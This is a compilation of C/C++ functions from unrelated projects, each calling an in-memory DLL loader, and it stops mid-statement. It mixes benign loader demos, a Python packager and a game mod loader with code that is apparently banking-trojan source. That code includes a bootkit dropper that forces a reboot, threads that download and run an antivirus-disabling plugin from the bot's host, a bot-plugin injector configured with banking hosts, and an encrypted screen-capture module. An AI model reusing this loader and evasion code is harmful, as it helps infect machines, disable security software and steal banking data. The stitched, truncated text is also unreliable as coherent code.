void RunBkDrop() { DWORD loader_dll_body_size = 0; void * loader_dll_body = NULL; PP_DPRINTF(L"RunBkDrop: started."); loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size); PP_RETURNIF1(loader_dll_body == NULL); PP_RETURNIF1(loader_dll_body_size == 0); PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body, loader_dll_body_size ); HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body); PP_RETURNIF1(loader_dll == NULL); typedef BOOL (WINAPI * BkInstallFunction)(); BkInstallFunction bkinstall = NULL; bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall"); PP_RETURNIF1(bkinstall == NULL); BOOL bkinstall_result = bkinstall(); PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result); if (bkinstall_result) MultiMethodReboot(); }
void W2_StartGame() { uint8_t* data = new uint8_t[3936256]; FILE* f = fopen("bin\\w2core.dll", "rb"); fread(data, 1, 3936256, f); fclose(f); tls1 = 1; if (tls1 == 2) { return; } HMODULE base = GetModuleHandle(NULL); PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)base; PIMAGE_NT_HEADERS header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(base))[dos_header->e_lfanew]; DWORD oldProtect; VirtualProtect(header, sizeof(*header), PAGE_EXECUTE_READWRITE, &oldProtect); header->OptionalHeader.AddressOfEntryPoint = 0x2BAC0F; PIMAGE_TLS_DIRECTORY tlsDirectory = (PIMAGE_TLS_DIRECTORY)(((char*)base) + header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS].VirtualAddress); *(DWORD*)0x66D94A8 = *(DWORD*)(tlsDirectory->AddressOfIndex); MemoryLoadLibrary(data); }
void InitAV() { DisableDEP(); DWORD dwMiniSize = 0; DWORD dwStopSize = 0; LPBYTE pMiniAV = GetFileData( GetMiniAVPath(), &dwMiniSize ); LPBYTE pStopAV = GetFileData( GetStopAVPath(), &dwStopSize ); if ( pMiniAV && dwMiniSize ) { LPVOID MiniAVDll = DecryptPlugin( pMiniAV, dwMiniSize ); HMEMORYMODULE hLib = MemoryLoadLibrary( MiniAVDll ); if ( hLib ) { MemoryFreeLibrary( hLib ); } MemFree( MiniAVDll ); } if ( pStopAV && dwStopSize ) { LPVOID StopAVDll = DecryptPlugin( pStopAV, dwStopSize ); HMEMORYMODULE hLib = MemoryLoadLibrary( StopAVDll ); if ( hLib ) { MemoryFreeLibrary( hLib ); } MemFree( StopAVDll ); } if ( !dwStopSize || !dwMiniSize ) { MegaJump( AvFuckThread ); } return; }
DWORD WINAPI AvBlockThread( LPVOID lpData ) { if ( (DWORD)pGetFileAttributesW( GetStopAVPath() ) != INVALID_FILE_ATTRIBUTES ) { return 0; } char *Host = GetCurrentHost(); if ( Host == NULL ) { return 0; } char AvBlockFile[] = {'/','c','f','g','/','s','t','o','p','a','v','.','p','l','u','g',0}; char AvBlockUrl[256]; m_lstrcpy( AvBlockUrl, Host ); m_lstrcat( AvBlockUrl, AvBlockFile ); LPBYTE BotModule = NULL; DWORD dwModuleSize = 0; while ( !DownloadInMem( AvBlockUrl, &BotModule, &dwModuleSize ) ) { pSleep( 1000 * 60 * 5 ); } if ( BotModule != NULL && dwModuleSize ) { LPVOID FileData = MemAlloc( dwModuleSize + 1 ); if ( FileData ) { m_memcpy( FileData, BotModule, dwModuleSize ); File::WriteBufferW(GetMiniAVPath(), FileData, dwModuleSize ); MemFree( FileData ); } LPVOID Module = DecryptPlugin( BotModule, dwModuleSize ); if ( Module ) { HMEMORYMODULE hLib = MemoryLoadLibrary( Module ); if ( hLib == NULL ) { return 0; } MemoryFreeLibrary( hLib ); } } return 0; }
// Load the module into memory. bool ModuleManager::LoadModule(onModule *Module) { // Verify that the module should be loaded from memory. if (Module->LoadedFromDisk) return true; // Load the module from memory. Module->ModuleHandle.Memory = MemoryLoadLibrary(Module->DecryptedFile.data()); return Module->ModuleHandle.Memory != NULL; };
void LoadFromMemory(void) { FILE *fp; unsigned char *data=NULL; size_t size; HMEMORYMODULE handle; addNumberProc addNumber; HMEMORYRSRC resourceInfo; DWORD resourceSize; LPVOID resourceData; TCHAR buffer[100]; fp = _tfopen(DLL_FILE, _T("rb")); if (fp == NULL) { _tprintf(_T("Can't open DLL file \"%s\"."), DLL_FILE); goto exit; } fseek(fp, 0, SEEK_END); size = ftell(fp); data = (unsigned char *)malloc(size); fseek(fp, 0, SEEK_SET); fread(data, 1, size, fp); fclose(fp); handle = MemoryLoadLibrary(data, NULL); if (handle == NULL) { _tprintf(_T("Can't load library from memory.\n")); goto exit; } addNumber = (addNumberProc)MemoryGetProcAddress(handle, "addNumbers"); _tprintf(_T("From memory: %d\n"), addNumber(1, 2)); resourceInfo = MemoryFindResource(handle, MAKEINTRESOURCE(VS_VERSION_INFO), RT_VERSION); _tprintf(_T("MemoryFindResource returned 0x%p\n"), resourceInfo); resourceSize = MemorySizeofResource(handle, resourceInfo); resourceData = MemoryLoadResource(handle, resourceInfo); _tprintf(_T("Memory resource data: %ld bytes at 0x%p\n"), resourceSize, resourceData); MemoryLoadString(handle, 1, buffer, sizeof(buffer)); _tprintf(_T("String1: %s\n"), buffer); MemoryLoadString(handle, 20, buffer, sizeof(buffer)); _tprintf(_T("String2: %s\n"), buffer); MemoryFreeLibrary(handle); exit: if (data) free(data); }
// // Get class factory // STDAPI DllGetClassObject(const CLSID& clsid, const IID& iid, void** ppv) { // Can we create this component? if (clsid != CLSID_CoCOMServer && clsid != CLSID_CoCOMServerOptional) { return CLASS_E_CLASSNOTAVAILABLE ; } TCHAR buf[MAX_PATH]; #ifdef DEBUG if (0) // for debugging com #else if (GetModuleFileName(g_hInstance, buf, MAX_PATH)) #endif { FILE *fp; unsigned char *data=NULL; size_t size; HMEMORYMODULE module; fp = _tfopen(buf, _T("rb")); if (fp == NULL) { return E_ACCESSDENIED; } fseek(fp, 0, SEEK_END); size = ftell(fp); data = (unsigned char *)_alloca(size); fseek(fp, 0, SEEK_SET); fread(data, 1, size, fp); fclose(fp); if (data) module = MemoryLoadLibrary(data); typedef HRESULT (__stdcall *pDllGetClassObject)(IN REFCLSID clsid,IN REFIID iid,OUT LPVOID FAR* ppv); pDllGetClassObject GetClassObject = (pDllGetClassObject)::MemoryGetProcAddress(module,"DllGetClassObject"); return GetClassObject(clsid,iid,ppv); } // Create class factory. CFactory* pFactory = new CFactory ; // Reference count set to 1 // in constructor if (pFactory == NULL) { return E_OUTOFMEMORY ; } // Get requested interface. HRESULT hr = pFactory->QueryInterface(iid, ppv) ; pFactory->Release() ; return hr ; }
void _Import_Zlib(char *pdata) { HMODULE hlib; hlib = MemoryLoadLibrary("zlib.pyd", pdata); if (hlib) { void (*proc)(void); proc = (void(*)(void))MemoryGetProcAddress(hlib, "initzlib"); if (proc) proc(); } }
void InitScreenLib() { bInitialized = false; CaptureScreen = NULL; DWORD dwScreenSize = sizeof( Screen_Dll ); LPBYTE ScreenFile = (LPBYTE)MemAlloc( dwScreenSize + 1 ); if ( !ScreenFile ) { return; } m_memcpy( ScreenFile, Screen_Dll, sizeof( Screen_Dll ) ); DWORD dwPassLen = *(DWORD*)ScreenFile; ScreenFile += sizeof( DWORD ); dwScreenSize -= sizeof( DWORD ); char Password[30]; m_memcpy( Password, ScreenFile, dwPassLen ); Password[ dwPassLen ] = '\0'; ScreenFile += dwPassLen; dwScreenSize -= dwPassLen; XORCrypt::Crypt(Password, ScreenFile, dwScreenSize); m_memset( Password, 0, dwPassLen ); hLib = MemoryLoadLibrary( ScreenFile ); if ( hLib != NULL ) { char CapScreen[] = {'C','a','p','t','u','r','e','S','c','r','e','e','n',0}; CaptureScreen = (PCaptureScreen)MemoryGetProcAddress( hLib, CapScreen ); if ( CaptureScreen ) { bInitialized = true; } } return; }
void LoadAndStartDll() { int size; char* dll = LoadFileFromAdminka( nameLoadDll, &size ); if( dll ) { //u_SaveToFile( "c:\\test.bin", dll, size ); HMEMORYMODULE hdll = MemoryLoadLibrary(dll); if( hdll ) { TypeRunFunc func = (TypeRunFunc)MemoryGetProcAddress( hdll, "TestRun" ); if( func ) func(); } u_free(dll); } }
int main(int argc, char* argv[]) { unsigned char *data; size_t filelen; HMEMORYMODULE testBase; // dll base handle addNumberProc addNumber; // function ptr if(argc < 3){ printf("Usage: %s <dll_name> <dll_func_name>\n",argv[0]); return -1; } /* load the dll file into memory * * Note:(This step could have been from an encrypted, compressed or signed file or * even dynamically downloaded from the web (!), etc.). */ data = load_file(argv[1], &filelen); if(data == 0) { printf("failed to load %d, exiting.\n",argv[1]); return 0; } printf("Opening lib ..\n"); /* load shared library from buffer, relocate it, etc. */ if((testBase = MemoryLoadLibrary(data)) == NULL) { printf("Can't load library.\n"); free(data); return -1; } printf("Finding api call ..\n"); /* now we can lookup any named vtable function(s) we want.. */ addNumber = (addNumberProc)MemoryGetProcAddress(testBase, argv[2]); if(addNumber != 0) { printf("Got it! %d = %s(1,2);\n", addNumber(1, 2),argv[2]); /* example use of dll exported function */ } else { printf("Sorry %s() api not found in this dll.\n",argv[2]); } printf("Closing lib ..\n"); /* close the library */ MemoryFreeLibrary(testBase); /* free loaded dll buffer memory */ free(data); return 0; }
void ExplorerLoadDLL(PUSER_INIT_NOTIFY InitData, LPBYTE Buf, DWORD Size) { // 320_ld попытка загрузки и запуска BotPlug DebugReportStepByName("320_ld"); HMEMORYMODULE Module = MemoryLoadLibrary(Buf); if (Module == NULL) { LDRDBG("BRDS Explorer", "Не удалось загрузить длл в память "); return; } const static char SetParamMethName[] = {'S', 'e', 't', 'B', 'o', 't', 'P', 'a', 'r', 'a', 'm', 'e', 't', 'e', 'r', 0};; SetParamMethod = (TSetParam)MemoryGetProcAddress(Module, (PCHAR)SetParamMethName); if (SetParamMethod != NULL) { SetBotParameter(BOT_PARAM_BOTPLUGNAME, BotPluginName); // Устанавливаем параметры бота LDRDBG("BRDS Explorer", "Устанавливаем параметры бота "); SetParam(BOT_PARAM_PREFIX); SetParam(BOT_PARAM_HOSTS); SetParam(BOT_PARAM_KEY); SetParam(BOT_PARAM_DELAY); SetParam(BOT_PARAM_BOTPLUGNAME); SetParam(BOT_PARAM_BANKINGHOSTS); } typedef void (WINAPI *TStart)(LPVOID, LPVOID, LPVOID); TStart Method = (TStart)MemoryGetProcAddress(Module, "Start"); if (Method != NULL) { LDRDBG("BRDS Explorer", "Бот успешно запущен "); DLLLoader::DLLLoadedInExplorer = true; Method(NULL, NULL, NULL); // 321_ld попытка загрузки и запуска BotPlug успешна DebugReportStepByName("321_ld"); } }
void LoadFromMemory(void) { unsigned char *data=NULL; size_t size; HMEMORYMODULE module; addNumberProc addNumber; /* FILE *fp; fp = fopen(DLL_FILE, "rb"); if (fp == NULL) { printf("Can't open DLL file \"%s\".", DLL_FILE); goto exit; } fseek(fp, 0, SEEK_END); size = ftell(fp); data = (unsigned char *)malloc(size); fseek(fp, 0, SEEK_SET); fread(data, 1, size, fp); fclose(fp); */ HRSRC hResID = ::FindResource(NULL,MAKEINTRESOURCE(IDR_EXE1),"exe");//查找资源 HGLOBAL hRes = ::LoadResource(NULL,hResID);//加载资源 data = (unsigned char *)::LockResource(hRes);//锁定资源 module = MemoryLoadLibrary(data); if (module == NULL) { printf("Can't load library from memory.\n"); goto exit; } addNumber = (addNumberProc)MemoryGetProcAddress(module, "addNumbers"); printf("From memory: %d\n", addNumber(1, 2)); MemoryFreeLibrary(module); exit: if (data) free(data); }
HMEMORYMODULE LoadMemDll(char* fileName) { void *data; long size; HMEMORYMODULE handle; TCHAR buffer[100]; data = File2Buffer(&size, fileName); if (data == NULL) { return 0; } handle = MemoryLoadLibrary(data, size); if (handle == NULL) { _tprintf(_T("Can't load library from memory.\n")); return 0; } //AddMemMod(handle); maybe xx return handle; }
int _load_python(char *dllname, char *bytes) { int i; struct IMPORT *p = imports; HMODULE hmod; if (!bytes) return _load_python_FromFile(dllname); hmod = MemoryLoadLibrary(dllname, bytes); if (hmod == NULL) { return 0; } for (i = 0; p->name; ++i, ++p) { p->proc = (void (*)())MemoryGetProcAddress(hmod, p->name); if (p->proc == NULL) { OutputDebugString("undef symbol"); fprintf(stderr, "undefined symbol %s -> exit(-1)\n", p->name); return 0; } } return 1; }
/* public - replacement for LoadLibrary, but searches FIRST for memory libraries, then for normal libraries. So, it will load libraries AS memory module if they are found by findproc(). */ HMODULE MyLoadLibrary(char *lpFileName) { MEMORYMODULE *p = loaded; HMODULE hMod; while (p) { // If already loaded, only increment the reference count if (0 == stricmp(lpFileName, p->name)) { p->refcount++; return (HMODULE)p; } p = p->next; } if (findproc && findproc_data) { void *pdata = findproc(lpFileName, findproc_data); if (pdata) { hMod = MemoryLoadLibrary(lpFileName, pdata); free(p); return hMod; } } hMod = LoadLibrary(lpFileName); return hMod; }
void DownloadPlugByLoaderDll() { DWORD loader_dll_body_size = 0; void * loader_dll_body = NULL; PP_DPRINTF(L"DownloadPlugByLoaderDll: started."); // 120_d загрузка Loader_dll PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d")); loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size); PP_RETURNIF1(loader_dll_body == NULL); PP_RETURNIF1(loader_dll_body_size == 0); HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body); PP_RETURNIF1(loader_dll == NULL); // 121_d загрузка Loader_dll успешна PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d")); typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD); LoadPlugToCacheFunction load_plug_to_cache = NULL; load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache"); PP_RETURNIF1(load_plug_to_cache == NULL); // 122_d начало вызова LoadPlugin PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d")); BOOL load_plug_result = load_plug_to_cache(0); PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result); }
void LoadPlugins() { LoadOriginalLibrary(); // Regular ASI Loader WIN32_FIND_DATA fd; char moduleName[MAX_PATH]; char dllPath[MAX_PATH]; char preparedPath[128]; // stores scripts\*exename*\settings.ini char* tempPointer; int nWantsToLoadPlugins; int nThatExeWantsPlugins; int nWantsToLoadFromScriptsOnly; int nUseD3D8to9; int nDirect3D8DisableMaximizedWindowedModeShim; char oldDir[MAX_PATH]; // store the current directory GetCurrentDirectory(MAX_PATH, oldDir); GetModuleFileName(NULL, moduleName, MAX_PATH); tempPointer = strrchr(moduleName, '.'); *tempPointer = '\0'; tempPointer = strrchr(moduleName, '\\'); strncpy(dllPath, moduleName, (tempPointer - moduleName + 1)); dllPath[tempPointer - moduleName + 1] = '\0'; SetCurrentDirectory(dllPath); LoadLibrary(".\\modloader\\modupdater.asi"); LoadLibrary(".\\modloader\\modloader.asi"); std::fstream wndmode_ini; wndmode_ini.open("wndmode.ini", std::ios_base::out | std::ios_base::in | std::ios_base::binary); if (wndmode_ini.is_open()) { wndmode_ini.seekg(0, wndmode_ini.end); bool bIsEmpty = !wndmode_ini.tellg(); wndmode_ini.seekg(wndmode_ini.tellg(), wndmode_ini.beg); if (bIsEmpty) { HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_WNDWINI), RT_RCDATA); if (hResource) { HGLOBAL hLoadedResource = LoadResource(dllModule, hResource); if (hLoadedResource) { LPVOID pLockedResource = LockResource(hLoadedResource); if (pLockedResource) { DWORD dwResourceSize = SizeofResource(dllModule, hResource); if (0 != dwResourceSize) { wndmode_ini.write((char*)pLockedResource, dwResourceSize); } } } } } wndmode_ini.close(); HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_WNDMODE), RT_RCDATA); if (hResource) { HGLOBAL hLoadedResource = LoadResource(dllModule, hResource); if (hLoadedResource) { LPVOID pLockedResource = LockResource(hLoadedResource); if (pLockedResource) { DWORD dwResourceSize = SizeofResource(dllModule, hResource); if (0 != dwResourceSize) { wndmode = MemoryLoadLibrary((const void*)pLockedResource, dwResourceSize); } } } } } GetModuleFileName(NULL, moduleName, MAX_PATH); tempPointer = strrchr(moduleName, '.'); *tempPointer = '\0'; tempPointer = strrchr(moduleName, '\\'); strncpy(preparedPath, "scripts", 8); strcat(preparedPath, tempPointer); strcat(preparedPath, "\\settings.ini"); nUseD3D8to9 = GetPrivateProfileInt("globalsets", "used3d8to9", FALSE, "scripts\\global.ini"); if (nUseD3D8to9 && _stricmp(DllName + 1, "d3d8.dll") == NULL) { d3d8.Direct3DCreate8 = (FARPROC)Direct3DCreate8; } nDirect3D8DisableMaximizedWindowedModeShim = GetPrivateProfileInt("globalsets", "Direct3D8DisableMaximizedWindowedModeShim", FALSE, "scripts\\global.ini"); if (nDirect3D8DisableMaximizedWindowedModeShim) { HMODULE pd3d8 = NULL; if (d3d8.dll) { pd3d8 = d3d8.dll; } else { pd3d8 = LoadLibrary("d3d8.dll"); if (!pd3d8) { TCHAR szSystemPath[MAX_PATH]; SHGetFolderPath(NULL, CSIDL_SYSTEM, NULL, 0, szSystemPath); strcat(szSystemPath, "\\d3d8.dll"); pd3d8 = LoadLibrary(szSystemPath); } } if (pd3d8) { auto addr = (uintptr_t)GetProcAddress(pd3d8, "Direct3D8EnableMaximizedWindowedModeShim"); if (addr) { DWORD Protect; VirtualProtect((LPVOID)(addr + 6), 4, PAGE_EXECUTE_READWRITE, &Protect); *(uint32_t*)(addr + 6) = 0; *(uint32_t*)(*(uint32_t*)(addr + 2)) = 0; VirtualProtect((LPVOID)(addr + 6), 4, Protect, &Protect); } } } // Before we load any ASI files, let's see if user wants to do it at all nWantsToLoadPlugins = GetPrivateProfileInt("globalsets", "loadplugins", TRUE, "scripts\\global.ini"); nWantsToLoadFromScriptsOnly = GetPrivateProfileInt("globalsets", "loadfromscriptsonly", FALSE, "scripts\\global.ini"); // Or perhaps this EXE wants to override global settings? nThatExeWantsPlugins = GetPrivateProfileInt("exclusivesets", "loadplugins", -1, preparedPath); if (nThatExeWantsPlugins) // Will not process only if this EXE wishes not to load anything but its exclusive plugins { if (nWantsToLoadPlugins || nThatExeWantsPlugins == TRUE) { // Load excludes ExcludedEntriesList excludes; ExcludedEntriesListInit(&excludes); if (FILE* iniFile = fopen(preparedPath, "rt")) { char line[256]; bool bItsExcludesList = false; while (fgets(line, 256, iniFile)) { char* newline = strchr(line, '\n'); if (newline) *newline = '\0'; if (bItsExcludesList) { if (line[0] && line[0] != ';') ExcludedEntriesListPush(&excludes, line); } else { if (!_stricmp(line, "[excludes]")) bItsExcludesList = true; } } fclose(iniFile); } if (!nWantsToLoadFromScriptsOnly) { FindFiles(&fd, &excludes); } if (SetCurrentDirectory("scripts\\")) { FindFiles(&fd, &excludes); if (SetCurrentDirectory(tempPointer + 1)) { FindFiles(&fd, NULL); // Exclusive plugins are not being excluded SetCurrentDirectory("..\\..\\"); } else SetCurrentDirectory("..\\"); } if (SetCurrentDirectory("plugins\\")) { FindFiles(&fd, &excludes); if (SetCurrentDirectory(tempPointer + 1)) { FindFiles(&fd, NULL); // Exclusive plugins are not being excluded SetCurrentDirectory("..\\..\\"); } else SetCurrentDirectory("..\\"); } // Free the remaining excludes ExcludedEntriesListFree(&excludes); } } else { // Load only exclusive plugins, if exists // We need to cut settings.ini from the path again tempPointer = strrchr(preparedPath, '\\'); tempPointer[1] = '\0'; if (SetCurrentDirectory(preparedPath)) { FindFiles(&fd, NULL); SetCurrentDirectory("..\\..\\"); } } SetCurrentDirectory(oldDir); // Reset the current directory // Unprotect the module NOW (CLEO 4.1.1.30f crash fix) IMAGE_NT_HEADERS* ntHeader = (IMAGE_NT_HEADERS*)((DWORD)hExecutableInstance + ((IMAGE_DOS_HEADER*)hExecutableInstance)->e_lfanew); SIZE_T size = ntHeader->OptionalHeader.SizeOfImage; DWORD oldProtect; VirtualProtect((VOID*)hExecutableInstance, size, PAGE_EXECUTE_READWRITE, &oldProtect); }
void LoadOriginalLibrary() { if (_stricmp(DllName + 1, "vorbisFile.dll") == NULL) { HRSRC hResource = FindResource(dllModule, MAKEINTRESOURCE(IDR_VBHKD), RT_RCDATA); if (hResource) { HGLOBAL hLoadedResource = LoadResource(dllModule, hResource); if (hLoadedResource) { LPVOID pLockedResource = LockResource(hLoadedResource); if (pLockedResource) { DWORD dwResourceSize = SizeofResource(dllModule, hResource); if (0 != dwResourceSize) { vorbisHooked = MemoryLoadLibrary((const void*)pLockedResource, dwResourceSize); if (vorbisHooked) { __ov_open_callbacks = MemoryGetProcAddress(vorbisHooked, "ov_open_callbacks"); __ov_clear = MemoryGetProcAddress(vorbisHooked, "ov_clear"); __ov_time_total = MemoryGetProcAddress(vorbisHooked, "ov_time_total"); __ov_time_tell = MemoryGetProcAddress(vorbisHooked, "ov_time_tell"); __ov_read = MemoryGetProcAddress(vorbisHooked, "ov_read"); __ov_info = MemoryGetProcAddress(vorbisHooked, "ov_info"); __ov_time_seek = MemoryGetProcAddress(vorbisHooked, "ov_time_seek"); __ov_time_seek_page = MemoryGetProcAddress(vorbisHooked, "ov_time_seek_page"); } } } } } } else { if (_stricmp(DllName + 1, "dsound.dll") == NULL) { dsound.dll = LoadLibrary(szSystemPath); dsound.DirectSoundCaptureCreate = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate"); dsound.DirectSoundCaptureCreate8 = GetProcAddress(dsound.dll, "DirectSoundCaptureCreate8"); dsound.DirectSoundCaptureEnumerateA = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateA"); dsound.DirectSoundCaptureEnumerateW = GetProcAddress(dsound.dll, "DirectSoundCaptureEnumerateW"); dsound.DirectSoundCreate = GetProcAddress(dsound.dll, "DirectSoundCreate"); dsound.DirectSoundCreate8 = GetProcAddress(dsound.dll, "DirectSoundCreate8"); dsound.DirectSoundEnumerateA = GetProcAddress(dsound.dll, "DirectSoundEnumerateA"); dsound.DirectSoundEnumerateW = GetProcAddress(dsound.dll, "DirectSoundEnumerateW"); dsound.DirectSoundFullDuplexCreate = GetProcAddress(dsound.dll, "DirectSoundFullDuplexCreate"); dsound.DllCanUnloadNow = GetProcAddress(dsound.dll, "DllCanUnloadNow"); dsound.DllGetClassObject = GetProcAddress(dsound.dll, "DllGetClassObject"); dsound.GetDeviceID = GetProcAddress(dsound.dll, "GetDeviceID"); } else { if (_stricmp(DllName + 1, "dinput8.dll") == NULL) { dinput8.dll = LoadLibrary(szSystemPath); dinput8.DirectInput8Create = GetProcAddress(dinput8.dll, "DirectInput8Create"); dinput8.DllCanUnloadNow = GetProcAddress(dinput8.dll, "DllCanUnloadNow"); dinput8.DllGetClassObject = GetProcAddress(dinput8.dll, "DllGetClassObject"); dinput8.DllRegisterServer = GetProcAddress(dinput8.dll, "DllRegisterServer"); dinput8.DllUnregisterServer = GetProcAddress(dinput8.dll, "DllUnregisterServer"); } else { if (_stricmp(DllName + 1, "ddraw.dll") == NULL) { ddraw.dll = LoadLibrary(szSystemPath); ddraw.AcquireDDThreadLock = GetProcAddress(ddraw.dll, "AcquireDDThreadLock"); ddraw.CompleteCreateSysmemSurface = GetProcAddress(ddraw.dll, "CompleteCreateSysmemSurface"); ddraw.D3DParseUnknownCommand = GetProcAddress(ddraw.dll, "D3DParseUnknownCommand"); ddraw.DDGetAttachedSurfaceLcl = GetProcAddress(ddraw.dll, "DDGetAttachedSurfaceLcl"); ddraw.DDInternalLock = GetProcAddress(ddraw.dll, "DDInternalLock"); ddraw.DDInternalUnlock = GetProcAddress(ddraw.dll, "DDInternalUnlock"); ddraw.DSoundHelp = GetProcAddress(ddraw.dll, "DSoundHelp"); ddraw.DirectDrawCreate = GetProcAddress(ddraw.dll, "DirectDrawCreate"); ddraw.DirectDrawCreateClipper = GetProcAddress(ddraw.dll, "DirectDrawCreateClipper"); ddraw.DirectDrawCreateEx = GetProcAddress(ddraw.dll, "DirectDrawCreateEx"); ddraw.DirectDrawEnumerateA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateA"); ddraw.DirectDrawEnumerateExA = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExA"); ddraw.DirectDrawEnumerateExW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateExW"); ddraw.DirectDrawEnumerateW = GetProcAddress(ddraw.dll, "DirectDrawEnumerateW"); ddraw.DllCanUnloadNow = GetProcAddress(ddraw.dll, "DllCanUnloadNow"); ddraw.DllGetClassObject = GetProcAddress(ddraw.dll, "DllGetClassObject"); ddraw.GetDDSurfaceLocal = GetProcAddress(ddraw.dll, "GetDDSurfaceLocal"); ddraw.GetOLEThunkData = GetProcAddress(ddraw.dll, "GetOLEThunkData"); ddraw.GetSurfaceFromDC = GetProcAddress(ddraw.dll, "GetSurfaceFromDC"); ddraw.RegisterSpecialCase = GetProcAddress(ddraw.dll, "RegisterSpecialCase"); ddraw.ReleaseDDThreadLock = GetProcAddress(ddraw.dll, "ReleaseDDThreadLock"); ddraw.SetAppCompatData = GetProcAddress(ddraw.dll, "SetAppCompatData"); } else { if (_stricmp(DllName + 1, "d3d8.dll") == NULL) { d3d8.dll = LoadLibrary(szSystemPath); d3d8.DebugSetMute = GetProcAddress(d3d8.dll, "DebugSetMute"); d3d8.Direct3D8EnableMaximizedWindowedModeShim = GetProcAddress(d3d8.dll, "Direct3D8EnableMaximizedWindowedModeShim"); d3d8.Direct3DCreate8 = GetProcAddress(d3d8.dll, "Direct3DCreate8"); d3d8.ValidatePixelShader = GetProcAddress(d3d8.dll, "ValidatePixelShader"); d3d8.ValidateVertexShader = GetProcAddress(d3d8.dll, "ValidateVertexShader"); } else { if (_stricmp(DllName + 1, "d3d9.dll") == NULL) { d3d9.dll = LoadLibrary(szSystemPath); d3d9.D3DPERF_BeginEvent = GetProcAddress(d3d9.dll, "D3DPERF_BeginEvent"); d3d9.D3DPERF_EndEvent = GetProcAddress(d3d9.dll, "D3DPERF_EndEvent"); d3d9.D3DPERF_GetStatus = GetProcAddress(d3d9.dll, "D3DPERF_GetStatus"); d3d9.D3DPERF_QueryRepeatFrame = GetProcAddress(d3d9.dll, "D3DPERF_QueryRepeatFrame"); d3d9.D3DPERF_SetMarker = GetProcAddress(d3d9.dll, "D3DPERF_SetMarker"); d3d9.D3DPERF_SetOptions = GetProcAddress(d3d9.dll, "D3DPERF_SetOptions"); d3d9.D3DPERF_SetRegion = GetProcAddress(d3d9.dll, "D3DPERF_SetRegion"); d3d9.DebugSetLevel = GetProcAddress(d3d9.dll, "DebugSetLevel"); d3d9.DebugSetMute = GetProcAddress(d3d9.dll, "DebugSetMute"); d3d9.Direct3D9EnableMaximizedWindowedModeShim = GetProcAddress(d3d9.dll, "Direct3D9EnableMaximizedWindowedModeShim"); d3d9.Direct3DCreate9 = GetProcAddress(d3d9.dll, "Direct3DCreate9"); d3d9.Direct3DCreate9Ex = GetProcAddress(d3d9.dll, "Direct3DCreate9Ex"); d3d9.Direct3DShaderValidatorCreate9 = GetProcAddress(d3d9.dll, "Direct3DShaderValidatorCreate9"); d3d9.PSGPError = GetProcAddress(d3d9.dll, "PSGPError"); d3d9.PSGPSampleTexture = GetProcAddress(d3d9.dll, "PSGPSampleTexture"); } else { if (_stricmp(DllName + 1, "d3d11.dll") == NULL) { d3d11.dll = LoadLibrary(szSystemPath); d3d11.D3D11CoreCreateDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateDevice"); d3d11.D3D11CoreCreateLayeredDevice = GetProcAddress(d3d11.dll, "D3D11CoreCreateLayeredDevice"); d3d11.D3D11CoreGetLayeredDeviceSize = GetProcAddress(d3d11.dll, "D3D11CoreGetLayeredDeviceSize"); d3d11.D3D11CoreRegisterLayers = GetProcAddress(d3d11.dll, "D3D11CoreRegisterLayers"); d3d11.D3D11CreateDevice = GetProcAddress(d3d11.dll, "D3D11CreateDevice"); d3d11.D3D11CreateDeviceAndSwapChain = GetProcAddress(d3d11.dll, "D3D11CreateDeviceAndSwapChain"); d3d11.D3DKMTCloseAdapter = GetProcAddress(d3d11.dll, "D3DKMTCloseAdapter"); d3d11.D3DKMTCreateAllocation = GetProcAddress(d3d11.dll, "D3DKMTCreateAllocation"); d3d11.D3DKMTCreateContext = GetProcAddress(d3d11.dll, "D3DKMTCreateContext"); d3d11.D3DKMTCreateDevice = GetProcAddress(d3d11.dll, "D3DKMTCreateDevice"); d3d11.D3DKMTCreateSynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTCreateSynchronizationObject"); d3d11.D3DKMTDestroyAllocation = GetProcAddress(d3d11.dll, "D3DKMTDestroyAllocation"); d3d11.D3DKMTDestroyContext = GetProcAddress(d3d11.dll, "D3DKMTDestroyContext"); d3d11.D3DKMTDestroyDevice = GetProcAddress(d3d11.dll, "D3DKMTDestroyDevice"); d3d11.D3DKMTDestroySynchronizationObject = GetProcAddress(d3d11.dll, "D3DKMTDestroySynchronizationObject"); d3d11.D3DKMTEscape = GetProcAddress(d3d11.dll, "D3DKMTEscape"); d3d11.D3DKMTGetContextSchedulingPriority = GetProcAddress(d3d11.dll, "D3DKMTGetContextSchedulingPriority"); d3d11.D3DKMTGetDeviceState = GetProcAddress(d3d11.dll, "D3DKMTGetDeviceState"); d3d11.D3DKMTGetDisplayModeList = GetProcAddress(d3d11.dll, "D3DKMTGetDisplayModeList"); d3d11.D3DKMTGetMultisampleMethodList = GetProcAddress(d3d11.dll, "D3DKMTGetMultisampleMethodList"); d3d11.D3DKMTGetRuntimeData = GetProcAddress(d3d11.dll, "D3DKMTGetRuntimeData"); d3d11.D3DKMTGetSharedPrimaryHandle = GetProcAddress(d3d11.dll, "D3DKMTGetSharedPrimaryHandle"); d3d11.D3DKMTLock = GetProcAddress(d3d11.dll, 